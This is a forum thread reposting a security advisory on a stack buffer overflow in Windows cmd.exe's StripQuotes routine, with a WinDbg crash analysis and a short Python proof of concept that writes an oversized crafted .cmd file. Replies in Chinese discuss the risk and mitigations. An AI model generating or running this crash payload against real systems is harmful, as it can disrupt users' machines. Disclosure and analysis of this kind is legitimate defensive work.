windows cmd.exe溢出漏洞
# Title: Microsoft Windows cmd.exe - Stack Buffer Overflow# Author: John Page (aka hyp3rlinx)
# Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CMD.EXE-STACK-BUFFER-OVERFLOW.txt
# ISR: ApparitionSec
www.microsoft.com
cmd.exe is the default command-line interpreter for the OS/2, eComStation, ArcaOS, Microsoft Windows (Windows NT family and Windows CE family), and ReactOS operating systems.
Stack Buffer Overflow
N/A
Specially crafted payload will trigger a Stack Buffer Overflow in the NT Windows "cmd.exe" commandline interpreter. Requires running an already dangerous file type like .cmd or .bat. However, when cmd.exe accepts arguments using /c /k flags which execute commands specified by string, that will also trigger the buffer overflow condition.
E.g. cmd.exe /c <PAYLOAD>.
(660.12d4): Stack buffer overflow - code c0000409 (first/second chance not available)
ntdll!ZwWaitForMultipleObjects+0x14:
00007ffb`00a809d4 c3 ret
0:000> .ecxr
rax=0000000000000022 rbx=000002e34d796890 rcx=00007ff7c0e492c0
rdx=00007ff7c0e64534 rsi=000000000000200e rdi=000000000000200c
rip=00007ff7c0e214f8 rsp=000000f6a82ff0a0 rbp=000000f6a82ff1d0
r8=000000000000200c r9=00007ff7c0e60520 r10=0000000000000000
r11=0000000000000000 r12=000002e34d77a810 r13=0000000000000002
r14=000002e34d796890 r15=000000000000200d
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
cmd!StripQuotes+0xa8:
00007ff7`c0e214f8 cc int 3
0:000> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
Failed calling InternetOpenUrl, GLE=12029
FAULTING_IP:
cmd!StripQuotes+a8
00007ff7`c0e214f8 cc int 3
EXCEPTION_RECORD:
ffffffffffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 00007ff7c0e214f8 (cmd!StripQuotes+0x00000000000000a8)
ExceptionCode: c0000409 (Stack buffer overflow)
ExceptionFlags: 00000001
NumberParameters: 1
Parameter: 0000000000000008
PROCESS_NAME: cmd.exe
ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.
EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.
EXCEPTION_PARAMETER1: 0000000000000008
MOD_LIST: <ANALYSIS/>
NTGLOBALFLAG: 0
APPLICATION_VERIFIER_FLAGS: 0
FAULTING_THREAD: 00000000000012d4
BUGCHECK_STR: APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_SOFTWARE_NX_FAULT_EXPLOITABLE
PRIMARY_PROBLEM_CLASS: STACK_BUFFER_OVERRUN_EXPLOITABLE
DEFAULT_BUCKET_ID: STACK_BUFFER_OVERRUN_EXPLOITABLE
LAST_CONTROL_TRANSFER: from 00007ffafcfca9c6 to 00007ffb00a809d4
STACK_TEXT:
000000f6`a82fea38 00007ffa`fcfca9c6 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!ZwWaitForMultipleObjects+0x14
000000f6`a82fea40 00007ffa`fcfca8ae : 00000000`00000098 00000000`00000096 00000000`d000022d 00000000`d000022d : KERNELBASE!WaitForMultipleObjectsEx+0x106
000000f6`a82fed40 00007ffa`fe1d190e : 00000000`00000000 000000f6`a82ff1d0 00007ff7`c0e3e000 00007ffb`009f5a81 : KERNELBASE!WaitForMultipleObjects+0xe
000000f6`a82fed80 00007ffa`fe1d150f : 00000000`00000000 00000000`00000000 00000000`00000003 00000000`00000001 : kernel32!WerpReportFaultInternal+0x3ce
000000f6`a82feea0 00007ffa`fd05976b : 00000000`00000000 000000f6`a82ff1d0 00000000`00000004 00000000`00000000 : kernel32!WerpReportFault+0x73
000000f6`a82feee0 00007ff7`c0e26b6a : 00007ff7`c0e3e000 00007ff7`c0e3e000 00000000`0000200e 00000000`0000200c : KERNELBASE!UnhandledExceptionFilter+0x35b
000000f6`a82feff0 00007ff7`c0e26df6 : 000002e3`00000000 00007ff7`c0e10000 000002e3`4d796890 00007ff7`c0e6602c : cmd!_raise_securityfailure+0x1a
000000f6`a82ff020 00007ff7`c0e214f8 : 000002e3`4d77a810 00000000`00000000 00000000`00000002 00000000`0000200e : cmd!_report_rangecheckfailure+0xf2
000000f6`a82ff0a0 00007ff7`c0e2096f : 00000000`0000200c 000000f6`a82ff1d0 000000f6`a82ff1d0 00000000`0000200e : cmd!StripQuotes+0xa8
000000f6`a82ff0d0 00007ff7`c0e239a9 : 000002e3`4d76ff90 000002e3`4d76ff90 00000000`00000000 000002e3`4d76ff90 : cmd!SearchForExecutable+0x443
000000f6`a82ff390 00007ff7`c0e1fb9e : 00000000`00000000 000002e3`4d76ff90 ffffffff`ffffffff 000002e3`4d990000 : cmd!ECWork+0x69
000000f6`a82ff600 00007ff7`c0e1ff35 : 00007ff7`c0e4fbb0 000002e3`4d76ff90 00000000`00000000 00000000`00000001 : cmd!FindFixAndRun+0x3de
000000f6`a82ffaa0 00007ff7`c0e2277e : 00000000`00000002 000000f6`a82ffbb0 00000000`00000000 00000000`00000002 : cmd!Dispatch+0xa5
000000f6`a82ffb30 00007ff7`c0e26a89 : 00000000`00000001 00000000`00000000 00007ff7`c0e3fd78 00000000`00000000 : cmd!main+0x1fa
000000f6`a82ffbd0 00007ffa`fe1e1fe4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : cmd!wil::details_abi::ProcessLocalStorage<wil::details_abi::ProcessLocalData>::~ProcessLocalStorage<wil::details_abi::ProcessLocalData>+0x289
000000f6`a82ffc10 00007ffb`00a4efc1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0x14
000000f6`a82ffc40 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
FOLLOWUP_IP:
cmd!StripQuotes+a8
00007ff7`c0e214f8 cc int 3
SYMBOL_STACK_INDEX: 8
SYMBOL_NAME: cmd!StripQuotes+a8
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: cmd
IMAGE_NAME: cmd.exe
DEBUG_FLR_IMAGE_TIMESTAMP: 0
STACK_COMMAND: ~0s ; kb
FAILURE_BUCKET_ID: STACK_BUFFER_OVERRUN_EXPLOITABLE_c0000409_cmd.exe!StripQuotes
BUCKET_ID: X64_APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_SOFTWARE_NX_FAULT_EXPLOITABLE_MISSING_GSFRAME_cmd!StripQuotes+a8
PAYLOAD=chr(235) + "\\CC"
PAYLOAD = PAYLOAD * 3000
with open("hate.cmd", "w") as f:
f.write(PAYLOAD)
Local
https://www.youtube.com/watch?v=wYYgjV-PzD8
Re: windows cmd.exe溢出漏洞
感谢分享这个漏洞信息。Windows cmd.exe 作为系统关键组件,出现栈溢出确实值得关注。从分析来看,触发条件需要用户主动运行恶意 .cmd/.bat 文件或通过 /c 参数传递载荷,实际利用可能需要结合其他社会工程手段。不过如果能在防御上提前留意可疑的命令行参数或脚本调用,应该能降低风险。不知道微软是否有回应或计划修复此问题?Re: windows cmd.exe溢出漏洞
这个漏洞分析得很详细,感谢分享。看起来是cmd.exe在处理/c或/k参数时对输入字符串长度校验不严导致的栈溢出。虽然需要配合.bat/.cmd文件或直接传入参数才能触发,但一旦成功利用,攻击者可能获取系统控制权。建议在日常使用中避免执行来源不明的批处理脚本,同时关注微软官方安全更新,及时打补丁。另外,可以考虑启用系统自带缓解措施,如DEP(数据执行保护)和ASLR(地址空间布局随机化),降低被利用风险。Re: windows cmd.exe溢出漏洞
感谢分享这个漏洞信息。从细节看,这确实是一个值得关注的栈缓冲区溢出问题,尤其通过 `/c` 或 `/k` 参数直接触发,攻击面相对较广。不过目前没有 CVE 编号,也没提到受影响的具体 Windows 版本范围——你是否有测试过不同版本的 Windows(如 Win10、Win11 或 Server 系列)是否都受影响?另外,这类漏洞虽然需要先有 .cmd/.bat 等危险文件或命令行执行权限,但结合社工或其它漏洞利用时风险会放大,建议大家在收到可疑批处理文件时保持警惕。期待后续有官方安全更新或更详细的缓解建议。
页:
[1]